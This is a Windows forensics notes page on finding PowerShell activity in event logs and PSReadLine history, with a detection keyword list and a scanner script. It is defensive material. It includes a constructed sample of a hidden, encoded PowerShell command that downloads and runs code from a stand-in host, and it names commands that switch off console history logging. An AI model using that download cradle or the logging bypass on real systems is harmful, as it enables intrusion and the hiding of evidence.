PowerShell activity

Windows DFIR notes are no longer maintained on InfoSec-Notes. Updated versions can be found on: artefacts.help.

Overview

Windows PowerShell 2.0 and earlier provide few useful audit settings, which limits the evidence available to an investigator (for instance, no interactive command history is kept).

Upon executing any PowerShell command or script, either locally or through PowerShell remoting, Windows may write events to the following event logs (not registry hives; the files live under %SystemRoot%\System32\winevt\Logs\):

  • Windows PowerShell.evtx (the legacy "Windows PowerShell" channel)

  • Microsoft-Windows-PowerShell%4Operational.evtx (the "Microsoft-Windows-PowerShell/Operational" channel, where script block logging (event ID 4104) and module logging (event ID 4103) are recorded when enabled)

  • Microsoft-Windows-PowerShell/Analytic (an .etl trace, disabled by default)
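Before relying on the logs above, it is worth checking which PowerShell audit settings are actually in force on the examined host, since an enabled channel with no logging policy will hold little. The function below is an added example, not part of the original notes: it reads the standard Group Policy registry values for script block logging, module logging and transcription, and queries the state and size of the three channels. It assumes it is run with administrative rights on the live host (for an offline image the SOFTWARE hive would have to be loaded first, which it does not handle).

```powershell
# Added example (not part of the original notes): report which PowerShell audit
# settings are in force on the host, so the analyst knows which of the logs
# listed above can be expected to hold evidence. Assumes the standard Group
# Policy registry locations for PowerShell logging and a live host.

function Get-PowerShellAuditState {
    [CmdletBinding()]
    param()

    $policyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

    # Helper: read a policy value, returning $null when the key or value is absent.
    $read = {
        param($SubKey, $Name)
        $path = Join-Path $policyRoot $SubKey
        if (Test-Path $path) {
            (Get-ItemProperty -Path $path -Name $Name -ErrorAction SilentlyContinue).$Name
        }
    }

    # Module logging stores the monitored module names as value names; '*' means every module.
    $moduleNames = $null
    $mnPath = Join-Path $policyRoot 'ModuleLogging\ModuleNames'
    if (Test-Path $mnPath) {
        $moduleNames = (Get-Item $mnPath).GetValueNames()
    }

    # Channel state for the logs listed above (the Analytic channel is disabled by default).
    $channels = 'Windows PowerShell',
                'Microsoft-Windows-PowerShell/Operational',
                'Microsoft-Windows-PowerShell/Analytic' |
        ForEach-Object {
            $log = Get-WinEvent -ListLog $_ -ErrorAction SilentlyContinue
            [pscustomobject]@{
                Channel     = $_
                Enabled     = if ($log) { $log.IsEnabled } else { $null }
                RecordCount = if ($log) { $log.RecordCount } else { $null }
                MaxSizeMB   = if ($log) { [math]::Round($log.MaximumSizeInBytes / 1MB) } else { $null }
            }
        }

    [pscustomobject]@{
        PSVersion             = $PSVersionTable.PSVersion.ToString()
        ScriptBlockLogging    = (& $read 'ScriptBlockLogging' 'EnableScriptBlockLogging') -eq 1
        ScriptBlockInvocation = (& $read 'ScriptBlockLogging' 'EnableScriptBlockInvocationLogging') -eq 1
        ModuleLogging         = (& $read 'ModuleLogging' 'EnableModuleLogging') -eq 1
        LoggedModules         = $moduleNames
        Transcription         = (& $read 'Transcription' 'EnableTranscripting') -eq 1
        TranscriptDirectory   = & $read 'Transcription' 'OutputDirectory'
        Channels              = $channels
    }
}

# Usage: policy summary first, then the per-channel table.
$state = Get-PowerShellAuditState
$state | Format-List PSVersion, ScriptBlockLogging, ScriptBlockInvocation, ModuleLogging, LoggedModules, Transcription, TranscriptDirectory
$state.Channels | Format-Table -AutoSize
```

Note that PowerShell 5.0 and later write event 4104 at Warning level for script blocks containing known suspicious keywords even when script block logging is not enabled by policy, so a host reporting ScriptBlockLogging as false may still hold a handful of 4104 events worth reviewing.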

Starting with PowerShell v5 on Windows 10, the commands entered in a PowerShell console are logged by the PSReadLine module to a user-scoped ConsoleHost_history.txt file. Console-less PowerShell sessions, such as the content of a PowerShell script or commands executed through the PowerShell ISE, are not recorded in this file. By default, the file is located under $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt; the path actually in use in a session is reported by (Get-PSReadLineOption).HistorySavePath. Bypassing PSReadLine logging is however easy, as it simply requires unloading the PSReadLine module (for instance with Remove-Module PSReadLine in an existing PowerShell session) or turning history saving off (Set-PSReadLineOption -HistorySaveStyle SaveNothing), so an empty or missing history file is not evidence that the console was unused.

As PowerShell implements its remoting functionality on top of the Windows Remote Management (WinRM) service, remote PowerShell activity may also generate events in the following event logs:

  • Microsoft-Windows-WinRM%4Operational.evtx (the "Microsoft-Windows-WinRM/Operational" channel)

  • Microsoft-Windows-WinRM/Analytic (an .etl trace, disabled by default)

The events linked to remote PowerShell activity, conducted through the WinRM service, are detailed in the Lateral movements section.

Additionally, if AppLocker script rules are enforced or audited, AppLocker records PowerShell script execution in the Microsoft-Windows-AppLocker/MSI and Script event log (event ID 8005 for an allowed script, 8006 for a script that would have been blocked in audit mode, 8007 for a blocked script).

The events providing command line / command history information should be searched for the following keywords (case insensitive search):

  • -Enc / -e

  • -nop / bypass

  • IEX / Invoke-Expression

  • ICM / Invoke-command

  • Net.WebClient / io.

  • DownloadString / DownloadFile

  • & / |

  • // / http / ftp / cifs / smb / etc.

  • join / nioj / replace / ecalper / -f / CHAR / RAHC / STRING / GNIRTS / marshal / convert / env / { / } (obfuscation detection)

While the occurrence of these keywords may indicate malicious activity, their absence is not proof that no malicious PowerShell activity took place, as PowerShell code can be deeply obfuscated.
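The keyword search above, run over both the PSReadLine history files and the script block events, as an added example that is not part of the original notes. The script turns the keyword list into named patterns so a hit reports why a line was flagged, decodes -EncodedCommand payloads before matching so the inner command is scanned too, and applies the check to three sources: a few constructed sample lines (assumed, not from a real case) so it can be tried offline, every user's ConsoleHost_history.txt at the default path, and event 4104 from Microsoft-Windows-PowerShell/Operational. The "&" and "|" keywords are deliberately left out of the patterns because they match most benign command lines; the third sample line shows a trivially obfuscated Invoke-Expression that no keyword catches, which is the caveat made above.

```powershell
# Added example (not from the original notes): triage PowerShell command lines
# against the keyword list above. Sample lines and the history path are
# assumptions; the 4104 property layout is that of PowerShell 5 script block events.

# One regex per keyword group so the report says *why* a line was flagged.
# PowerShell accepts any unambiguous prefix of -EncodedCommand; the common ones are listed.
$SuspiciousPatterns = [ordered]@{
    EncodedCommand = '(?i)(^|\s)-(e|ec|en|enc|encoded|encodedcommand)\s'
    NoProfile      = '(?i)(^|\s)-(nop|noprofile)\b|bypass'
    InvokeExpr     = '(?i)\b(iex|invoke-expression)\b'
    InvokeCommand  = '(?i)\b(icm|invoke-command)\b'
    WebClient      = '(?i)net\.webclient|\bio\.|downloadstring|downloadfile'
    RemoteLocation = '(?i)//|\bhttp|\bftp|\bcifs|\bsmb'
    Obfuscation    = '(?i)\b(join|nioj|replace|ecalper|char|rahc|string|gnirts|marshal|convert)\b|\s-f\s|[{}]'
}

function ConvertFrom-EncodedCommand {
    # -EncodedCommand carries base64 of a UTF-16LE string; decode it so the
    # inner command can be scanned as well. Returns $null when there is none.
    param([string]$CommandLine)
    if ($CommandLine -match '(?i)-(e|ec|en|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]{16,})') {
        try {
            return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2]))
        } catch { return $null }
    }
}

function Test-SuspiciousCommand {
    # Emits one object per flagged line; emits nothing for lines with no hit.
    param([string]$CommandLine, [string]$Source = 'input')
    $decoded = ConvertFrom-EncodedCommand $CommandLine
    $text = if ($decoded) { "$CommandLine`n$decoded" } else { $CommandLine }
    $hits = foreach ($name in $SuspiciousPatterns.Keys) {
        if ($text -match $SuspiciousPatterns[$name]) { $name }
    }
    if ($hits) {
        [pscustomobject]@{
            Source      = $Source
            Indicators  = ($hits -join ',')
            Decoded     = $decoded
            CommandLine = $CommandLine
        }
    }
}

# Every user's PSReadLine history at the default path (users may have moved or disabled it).
function Get-ConsoleHistoryHits {
    Get-ChildItem 'C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt' -ErrorAction SilentlyContinue |
        ForEach-Object {
            $user = $_.FullName.Split('\')[2]
            Get-Content $_.FullName | ForEach-Object { Test-SuspiciousCommand $_ "history:$user" }
        }
}

# Script block logging events (4104) from the Operational channel. Large script
# blocks are split over several 4104 events, so a hit may be only a fragment.
function Get-ScriptBlockHits {
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -ErrorAction SilentlyContinue |
        ForEach-Object {
            # ScriptBlockText is the third EventData property of a 4104 event.
            Test-SuspiciousCommand $_.Properties[2].Value "4104:$($_.TimeCreated.ToString('s'))"
        }
}

# Constructed sample lines (not from a real host) so the scanner can be tried offline.
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(
    "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a')"))
$sample = @(
    'Get-ChildItem C:\Windows\System32 | Select-Object Name',
    "powershell -nop -w hidden -e $encoded",
    "& ('Inv'+'oke-Expression') 'Get-Date'",   # obfuscated: no keyword matches, illustrating the caveat above
    'Get-Date'
)
$sample | ForEach-Object { Test-SuspiciousCommand $_ 'sample' } | Format-Table -AutoSize

# On a live host, run the same check over the real artefacts:
# Get-ConsoleHistoryHits | Format-Table -AutoSize
# Get-ScriptBlockHits    | Format-Table -AutoSize
```

Only the second sample line is reported, with EncodedCommand, NoProfile, InvokeExpr, WebClient and RemoteLocation as indicators, the last three coming from the decoded payload rather than the visible command line; the obfuscated third line passes silently, which is why keyword triage is a starting point and not a verdict.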

PowerShell deobfuscation

The PSDecode PowerShell script can be used to deobfuscate malicious PowerShell scripts that use several layers of encoding.

https://github.com/R3MRUM/PSDecode

Import-Module PSDecode.psm1

PSDecode <ENCODED_POWERSHELL_FILE>

PowerShell Windows events


References

https://www.blackhat.com/docs/us-14/materials/us-14-Kazanciyan-Investigating-Powershell-Attacks.pdf

https://www.jpcert.or.jp/english/pub/sr/20170612ac-ir_research_en.pdf

http://jpcertcc.github.io/ToolAnalysisResultSheet/details/PowerSploit_Invoke-Mimikatz.htm

https://www.eventsentry.com/blog/2018/01/powershell-p0wrh11-securing-powershell.html

https://www.powershellmagazine.com/2014/07/16/investigating-powershell-attacks/

https://nsfocusglobal.com/Attack-and-Defense-Around-PowerShell-Event-Logging

https://static1.squarespace.com/static/552092d5e4b0661088167e5c/t/59c1814829f18782e24f1fe2/1505853768977/Windows+PowerShell+Logging+Cheat+Sheet+ver+Sept+2017+v2.1.pdf

https://www.eventtracker.com/EventTracker/media/EventTracker/Files/support-docs/Integration-Guide-Windows-PowerShell.pdf

https://www.blackhat.com/docs/us-14/materials/us-14-Kazanciyan-Investigating-Powershell-Attacks-WP.pdf

https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WinRM.htm
